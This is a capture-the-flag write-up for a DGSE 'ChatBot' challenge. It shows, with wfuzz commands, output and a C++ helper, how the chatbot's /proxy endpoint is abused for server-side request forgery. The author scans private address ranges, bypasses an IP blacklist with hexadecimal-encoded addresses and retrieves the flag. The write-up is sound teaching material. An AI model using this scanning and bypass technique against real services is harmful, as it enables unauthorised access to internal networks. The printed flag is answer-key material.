Writeup DGSE - CTF - ChatBot

This article describes my solution for the 100-point challenge called “ChatBot”.

Introduction

EvilGouv recently opened a chatbot service, you know, one of those things nobody likes. Besides being particularly bad, it must surely have a flaw.
Find a way to access the intranet!
Link: http://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4
Hint: Local network
The flag has the form: DGSESIEE{x} where x is a hash

Start

So we have a chatbot to which we can send 3 default messages: “Hello”, “Job list” and “How to apply”.

Sending “Hello” or “Job list” doesn’t do anything special. Things get interesting when we send “How to apply”: the bot tells us that we can browse https://www.qwant.com to find their administration and apply.

I noticed that as soon as a message contains a link (presumably detected with a regular expression), an HTTP request is made for that URL: the link is passed as the url query parameter of a /proxy endpoint. For example, if we send https://google.fr, the following request is executed.

https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=https://google.fr
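
As a rough illustration of the behaviour described above, here is a minimal Python sketch that finds links in a message and builds the matching /proxy request. The regular expression is hypothetical (the one actually used by the chat page is unknown), and the function name is mine.

```python
import re
from typing import List

# Base path of the challenge, taken from the request shown above.
BASE = "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4"

# Hypothetical pattern: the real one used by the chat page is unknown.
URL_PATTERN = re.compile(r"https?://\S+")


def proxy_requests(message: str) -> List[str]:
    """Return the /proxy request URL for every link found in a message."""
    return [f"{BASE}/proxy?url={link}" for link in URL_PATTERN.findall(message)]


print(proxy_requests("have a look at https://google.fr"))
```

A message without any link, such as “Hello”, yields an empty list, which matches the observation that only messages containing a URL trigger a request.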

So we have some information, including:

A clue: “local network”, which points to private IP addresses (I assumed a /24 range such as 192.168.1.0/24).
The bot behind the chat makes an HTTP request as soon as it detects that a URL has been sent to it.

Exploitation

The first thing that comes to mind is to send every IP address of a local network in turn and see what comes back. For this, I will use wfuzz, a web fuzzer. On Arch Linux, simply install the wfuzz package.

Generate the IP address set

Here’s how I generated all the IP addresses of a local network (usually 192.168.1.0/24), using a fish shell loop.

for i in (seq 1 255); echo 192.168.1.$i; end > ip.txt
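
For readers who do not use fish, the same list can be sketched in Python with the standard ipaddress module. The function name host_list is an illustrative choice. Note one difference: hosts() skips the network and broadcast addresses, so it yields 254 entries, whereas the shell loop above also emits 192.168.1.255.

```python
import ipaddress
from typing import List


def host_list(cidr: str) -> List[str]:
    """Return every usable host address of a network, in dotted notation."""
    return [str(host) for host in ipaddress.ip_network(cidr).hosts()]


ips = host_list("192.168.1.0/24")
print(len(ips), ips[0], ips[-1])  # 254 192.168.1.1 192.168.1.254
```

Writing "\n".join(ips) to ip.txt would give a wordlist usable by wfuzz.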

Fuzz

Now that we have our IP addresses, we can launch our attack.

wfuzz -u "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://FUZZ" -w ip.txt
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://FUZZ
Total requests: 255

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   403        0 L      1 W        9 Ch        "192.168.1.1"
000000003:   403        0 L      1 W        9 Ch        "192.168.1.3"
000000007:   403        0 L      1 W        9 Ch        "192.168.1.7"
000000015:   403        0 L      1 W        9 Ch        "192.168.1.15"
000000031:   403        0 L      1 W        9 Ch        "192.168.1.31"
000000050:   403        0 L      1 W        9 Ch        "192.168.1.50"
000000049:   403        0 L      1 W        9 Ch        "192.168.1.49"
000000048:   403        0 L      1 W        9 Ch        "192.168.1.48"

The HTTP code returned is always the same: 403, so this is not promising. At that point I was a bit stuck, because I couldn’t tell whether my exploit was working or not. I also tried the 192.168.0.0/24 range and got the same HTTP code every time.

To get back to basics, I tried to understand what kind of flaw this type of exploitation relies on. It turns out it’s called a Server-Side Request Forgery (SSRF). Looking at how SSRF flaws are usually exploited, I came across a list of techniques to bypass blacklists. The first one I tried was to change the encoding of the address, from base 10 to base 16. It turns out that many URL parsers and network libraries accept an IPv4 address written as a single hexadecimal number.
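
The probing that wfuzz performs here can be sketched in a few lines of Python. This is only an approximation of what the tool does, not its implementation: the names fetch_status and scan are mine, and the status lookup is passed in as a parameter so the filtering logic can be tried without touching the network.

```python
import urllib.error
import urllib.request
from typing import Callable, Iterable, List

BASE = "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4"


def fetch_status(url: str) -> int:
    """Return the HTTP status code of a GET request, error codes included."""
    try:
        with urllib.request.urlopen(url, timeout=5) as response:
            return response.status
    except urllib.error.HTTPError as err:
        return err.code  # e.g. 403 when the proxy refuses the target


def scan(hosts: Iterable[str],
         status_of: Callable[[str], int] = fetch_status) -> List[str]:
    """Return the hosts for which the proxy answers 200."""
    return [host for host in hosts
            if status_of(f"{BASE}/proxy?url=http://{host}") == 200]
```

Calling scan(open("ip.txt").read().split()) would replay the run above, assuming the challenge is still online. Connection failures are not handled in this sketch.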
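
To make the encoding idea concrete, here is a small Python sketch that rewrites a dotted IPv4 address as a single number in several bases. The function name alternative_forms is illustrative. Classic inet_aton-style parsers accept these notations, but whether a given HTTP client does is something to verify case by case.

```python
import ipaddress
from typing import Dict


def alternative_forms(dotted: str) -> Dict[str, str]:
    """Return single-number notations of a dotted IPv4 address."""
    value = int(ipaddress.IPv4Address(dotted))  # the address as a 32-bit integer
    return {
        "decimal": str(value),
        "hex": f"0x{value:08x}",
        "octal": f"0{value:o}",
    }


print(alternative_forms("192.168.1.1")["hex"])  # 0xc0a80101
```

All of these strings denote the same host, but none of them contains the familiar “192.168.” prefix that a string-based filter would look for.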

IP address conversion

To convert my IP addresses to base 16, I wrote the following C++ code. It’s pretty simple: it takes an IP address as its first argument and prints its hexadecimal notation.

#include <arpa/inet.h>
#include <cstdio>
#include <iostream>

// Print an IPv4 address (given in network byte order) as one hexadecimal number.
void ipToHexa(in_addr_t addr) {
	// ntohl() converts to host byte order, so the first octet is printed first
	// and no manual byte swapping is needed.
	std::printf("0x%08x\n", static_cast<unsigned>(ntohl(addr)));
}

int main(int argc, char *argv[]) {
	if (argc < 2) {
		std::cerr << "usage: " << argv[0] << " <ipv4-address>\n";
		return 1;
	}
	// inet_addr() parses dotted notation and returns INADDR_NONE on error.
	in_addr_t addr = inet_addr(argv[1]);
	if (addr == INADDR_NONE) {
		std::cerr << "invalid IPv4 address: " << argv[1] << "\n";
		return 1;
	}
	ipToHexa(addr);
	return 0;
}

Compile it.

g++ ip.cpp -o ip

Test it.

./ip 192.168.1.1
0xc0a80101

Generation of IP addresses in base 16

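This time the list is built from the 192.168.0.0/24 range, which is the range the hit in the next section belongs to.

for i in (seq 1 255); ./ip 192.168.0.$i ; end > encoded_ip.txt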

Fuzz again

Let’s launch the previous attack again, this time with our IP addresses encoded in base 16.

wfuzz -u "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://FUZZ" -w encoded_ip.txt --sc 200
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://FUZZ
Total requests: 255

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000070:   200        0 L      36 W     1052 Ch     "0xc0a80046"

With --sc 200, only responses with a 200 HTTP code are shown, and there is exactly one: 0xc0a80046, which is 192.168.0.70 in dotted notation. Let’s see what is displayed at this URL.

curl -sSf "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://0xc0a80046"
{"contents":"<!DOCTYPE html>\n<html>\n\n<head>\n  <meta charset=\"utf-8\">\n  <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\">\n  <link href=\"/35e334a1ef338faf064da9eb5f861d3c/fontawesome/css/all.min.css\" rel=\"stylesheet\">\n  <link href=\"/35e334a1ef338faf064da9eb5f861d3c/bootstrap/css/bootstrap.min.css\" rel=\"stylesheet\">\n  <link href=\"/35e334a1ef338faf064da9eb5f861d3c/css/style_index.css\" rel=\"stylesheet\">\n  <link rel=\"icon\" href=\"/35e334a1ef338faf064da9eb5f861d3c/img/favicon.ico\" />\n  <title>Evil Gouv intranet</title>\n</head>\n\n<body>\n  <div>\n    <h1>FLAG DGSESIEE{2cf1655ac88a52d3fe96cb60c371a838}</h1>\n</div>\n</body>\n<script src=\"/35e334a1ef338faf064da9eb5f861d3c/js/jquery-3.5.1.min.js\"></script>\n<script src=\"/35e334a1ef338faf064da9eb5f861d3c/js/popper.min.js\"></script>\n<script src=\"/35e334a1ef338faf064da9eb5f861d3c/js/bootstrap.min.js\"></script>\n\n</html>","title":"Evil Gouv intranet","icon":"Null"}

The response is a JSON object whose contents field holds an HTML page. Here is what we get when filtering on the element we are looking for.

curl -sSf "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://0xc0a80046" | grep -oE "DGSESIEE{.*?}" | cut -d '<' -f 1
DGSESIEE{2cf1655ac88a52d3fe96cb60c371a838}
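
The same extraction can be sketched in Python by decoding the JSON first and then searching the HTML held in its contents field. The function name extract_flag is illustrative, the sample body is a shortened copy of the response shown above, and the pattern assumes the hash is written in lowercase hexadecimal.

```python
import json
import re
from typing import Optional


def extract_flag(body: str) -> Optional[str]:
    """Return the flag found in the proxy's JSON response, if any."""
    page = json.loads(body)["contents"]  # the HTML of the fetched page
    match = re.search(r"DGSESIEE\{[0-9a-f]+\}", page)  # assumes a hex hash
    return match.group(0) if match else None


# Shortened copy of the response shown above.
sample = json.dumps({
    "contents": "<h1>FLAG DGSESIEE{2cf1655ac88a52d3fe96cb60c371a838}</h1>",
    "title": "Evil Gouv intranet",
    "icon": "Null",
})
print(extract_flag(sample))  # DGSESIEE{2cf1655ac88a52d3fe96cb60c371a838}
```

Decoding the JSON before matching avoids depending on where the closing brace of the JSON object falls on the line.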

We bypassed the blacklist by encoding the IP address in base 16, which validates this challenge.
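
To illustrate why the trick can work, here is a Python sketch of a naive string-based filter. It is purely hypothetical: the challenge’s real blacklist is not known, and both the BLOCKED pattern and the function names are assumptions made for this example.

```python
import ipaddress
import re

# Hypothetical filter: rejects hosts that *look like* private dotted addresses.
BLOCKED = re.compile(r"^(10|127|192\.168|172\.(1[6-9]|2\d|3[01]))\.")


def naive_is_blocked(host: str) -> bool:
    """Return True when the host string starts with a private dotted prefix."""
    return bool(BLOCKED.match(host))


def to_dotted(hex_host: str) -> str:
    """Convert a hexadecimal host such as 0xc0a80046 back to dotted notation."""
    return str(ipaddress.IPv4Address(int(hex_host, 16)))


print(naive_is_blocked("192.168.0.70"))  # True
print(naive_is_blocked("0xc0a80046"))    # False
print(to_dotted("0xc0a80046"))           # 192.168.0.70
```

Both strings name the same machine, but only the dotted one matches the pattern, which would be consistent with the 403 responses seen for dotted addresses and the 200 obtained with the hexadecimal one.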